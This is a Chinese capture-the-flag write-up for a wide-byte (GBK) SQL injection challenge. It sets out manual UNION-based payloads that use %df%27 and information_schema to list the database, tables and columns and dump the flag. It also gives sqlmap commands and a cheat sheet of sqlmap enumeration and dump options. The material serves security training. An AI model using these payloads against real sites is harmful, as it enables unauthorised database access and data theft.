天天看点
返回

SQL注入

题目: http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1 本题为宽字节注入,本文重点讲解SQL注入相关方法。

方法一:

1、爆出数据库

手工

id=%df%27%20union%20select%201,%20database()%23

工具

python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' --current-db

2、爆出表

id=%df%27 union select 1,group_concat(table_name)from information_schema.tables where table_schema=database()%23
-T sae-chinalover --tables

3、爆出表的内容

id=%df%27 union select 1,group_concat(column_name)from information_schema.columns where table_name=ctf4%23

ctf4进行16进制转换

id=%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746634%23

-T sae-chinalover -T ctf4 --columns

4、获取列的内容

id=%df%27 union select 1,group_concat(flag) from ctf4%23
-T sae-chinalover -T ctf4 -C flag --dump

方法二:

sqlmap -u " http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27

" --search -C flag

--level 3 --risk 1 --thread 10

方法三:

SQL注入
关注黄色标注,打开此文件可得。

关于手工注入:

后续参考:

1、

SQL备忘录

2、

SQL Injection

关于sqlmap注入:

-h 显示基础的帮助消息并退出

-hh 显示高级的帮助消息并退出

-u 目标url

--thread 10 最大为10

--level 3 最大为5

--risk 3 最大为3

-a 检索所有

--current-db 检索当前数据库

--tables 枚举数据库表名

--columns 枚举数据库列名

--dump 输出数据库表的数据

--search 查找特定的列名,表名或数据库名,配合-D,-C,-T

-D 指定数据库名

-T 指定数据库表名

-C 指定数据库列名

--common-tables 检测常见的表名

--common-columns 检测常见的列名

sql 数据库 Python sql注入问题 变量SQL注入 防止sql注入 SQL注入权限 SQL注入拦截
上一篇: Bugku-今日练习
下一篇: web8

继续阅读